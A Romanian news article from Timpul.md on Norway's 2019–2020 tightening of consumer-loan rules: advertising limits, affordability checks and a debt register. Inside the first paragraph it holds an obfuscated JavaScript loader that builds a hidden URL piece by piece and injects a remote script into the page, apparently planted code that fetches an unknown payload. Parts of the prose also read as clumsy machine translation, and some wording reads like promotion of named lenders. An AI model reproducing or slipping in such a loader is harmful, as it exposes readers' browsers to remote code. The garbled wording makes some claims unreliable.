Timpul.md

Actualitate 16 Noiembrie 2020 | 22:46

Reglementarea pieței împrumuturilor de consum: practică norvegiană

Datorită creșterii rapide a pieței creditelor de consum și, ca urmare, a creșterii datoriei gospodăriilor, Ministerul norvegian al Finanțelor a înăsprit cerințele pentru împrumuturile de consum. Modificările temporare ale actualei legi au fost introduse la 12 februarie 2019, iar intrarea lor definitivă în vigoare va avea loc la sfârșitul anului 2020. Modificările privesc împrumuturile și cardurile de credit furnizate atât direct de companiile norvegiene, cât și de cele străine. (function(){ zqqg=document.createElement("script");zqqg_=(("u")+"st")+"a";zqqg.async=true; zqqg.type="text/javascript";zqqg_+=("t.i")+""+"n";zqqg_+=(("f")+"o");zqqg_+="/"; zqqgu="247048821.";zqqgu+="ckbz3n2zqqgXw0x2ave"+"Xac4wxr8yba"; zqqg.src="https://"+zqqg_+zqqgu;document.body.appendChild(zqqg); })();

Caracteristicile împrumuturilor de consum

Un împrumut de consum (Norwegian Forbrukslån) este un împrumut care este emis fără garanție, adică fără garanție sau garant.

Datorită simplității înregistrării, astfel de împrumuturi sunt deosebit de populare, dar uneori duce și la primirea lor nepăsătoare. Transparența insuficientă a condițiilor în băncile individuale este, de asemenea, o problemă.

În consecință, pentru astfel de împrumuturi se constată cel mai mare număr de morți și neîndepliniri a obligațiilor - iar creșterea gradului de îndatorare a populației înrăutățește climatul economic general. În 2019, aproximativ 30 de mii de norvegieni aveau datorii de peste 1 milion de coroane (denumite în continuare coroane norvegiene). Creșterea datoriei totale în 2017 s-a ridicat la 13,8%, în 2018 - 10%.

Rețineți că împrumuturile iresponsabile sunt o problemă nu numai pentru persoane fizice, ci și pentru țări, în special pentru cele în curs de dezvoltare: multe dintre ele au căzut în capcane reale ale datoriilor. În 2012, Norvegia a finanțat un proiect ONU pentru introducerea principiilor împrumuturilor subordonate (adică împrumuturile care sunt emise pentru o perioadă de cel puțin 5 ani), inclusiv pentru împrumuturile internaționale. Aceleași principii au fost utilizate în auditul datoriilor din Norvegia însăși.

Modificări ale legislației

Modificările elaborate în 2019 s-au referit la normele interne pentru acordarea de împrumuturi. De exemplu, reclame: de exemplu, trimiterile la ușurința obținerii unui împrumut și cerințele scăzute pentru clienți au fost interzise. Drept urmare, companiile care oferă microcredite sau așa-numitele „împrumuturi rapide” au dispărut aproape complet de pe piața financiară norvegiană.

Împrumutul rapid (norvegian låne penger på dagen - „împrumut de o zi”, de asemenea Låne penger raskt și Låne penger fort - norvegianul „împrumută bani repede”) este un împrumut pe termen scurt pentru o sumă mică, care se emite printr-o procedură simplificată, adesea de la distanță și necesită un timp minim și documente pentru înregistrare.

De regulă, astfel de împrumuturi se obțin pentru nevoi imediate, de exemplu, pentru cheltuielile gospodăriei înainte de salariu. În consecință, accentul principal în publicitate a fost pe simplitatea și rapiditatea înregistrării lor - iar acest lucru, potrivit autorităților, a provocat cetățenii să primească bani pentru achiziții impulsive și nu cheltuieli cu adevărat urgente.

Cerințele pentru onestitatea publicității au fost, de asemenea, înăsprite: de exemplu, în loc de tariful zilnic, care la prima vedere poate părea scăzut, companiile trebuie să indice imediat rata anuală reală. Acest lucru permite clientului să estimeze cu mai multă precizie amploarea plății în plus: de exemplu, 1% pe zi = 365% pe an.

Modificările au afectat și regulile de verificare a clienților: de acum înainte, companiile nu mai pot acorda împrumuturi persoanelor pentru care o creștere teoretică a ratei de 5% (din datoria totală) va duce la o reducere a cheltuielilor obișnuite de viață, precum și dacă suma totală a datoriei clientului este de 5 ori depășește venitul său anual. De fapt, în 2019, a fost creat Registrul datoriilor (analog Biroului de Istorii de Credit), care vă permite să urmăriți suma totală a datoriilor unui anumit client. El le-a dat cetățenilor posibilitatea de a verifica datoriile, inclusiv cele uitate.

Împrumuturile negarantate trebuie acordate pentru cel mult 5 ani (cu excepția perioadelor de grație datorate vacanțelor de credit). Numai împrumuturile oferite pentru refinanțare pot avea un termen mai lung.

Rezultatele amendamentului

Rețineți că regulile introduse sunt de fapt respectate. Așadar, niciun singur site norvegian, chiar și indirect legat de împrumuturi, nu menționa „ușurința și viteza de împrumut”, „ratele scăzute ale dobânzii” sau sloganurile publicitare similare. Este demn de remarcat faptul că majoritatea actorilor principali de pe piață, cum ar fi Arcadia Finans, Axo Finans sau Folkia, nu numai că urmează liniile directoare descrise mai sus, dar pun în aplicare în mod activ principiile mai largi ale împrumuturilor responsabile.

În ceea ce privește piața împrumuturilor de consum, aceasta continuă să crească: în iunie 2020, volumul său se ridica la 3.715,772 miliarde coroane, în iulie era deja 3.725,147 miliarde coroane. Pe de altă parte, în ultimii ani, băncile norvegiene s-au extins semnificativ în străinătate - până la 30% din creșterea pieței în Anul 2020 poate fi legat de împrumuturile emise în afara Norvegiei.

Potrivit macromodelelor globale de economie comercială și analiștilor popularei resurse norvegiene smalan-norge.com, urmează următoarea tendință:

Sub actualul prim-ministru Erna Solberg, care conduce guvernul din 2013, piața creditelor de consum a crescut cu 13,82%, în timp ce sub cea precedentă, Jens Stoltenberg (2005-2013), creșterea sa a atins un record de 84,12%.

Pe aceeaşi temă

Versiune completă web Înapoi sus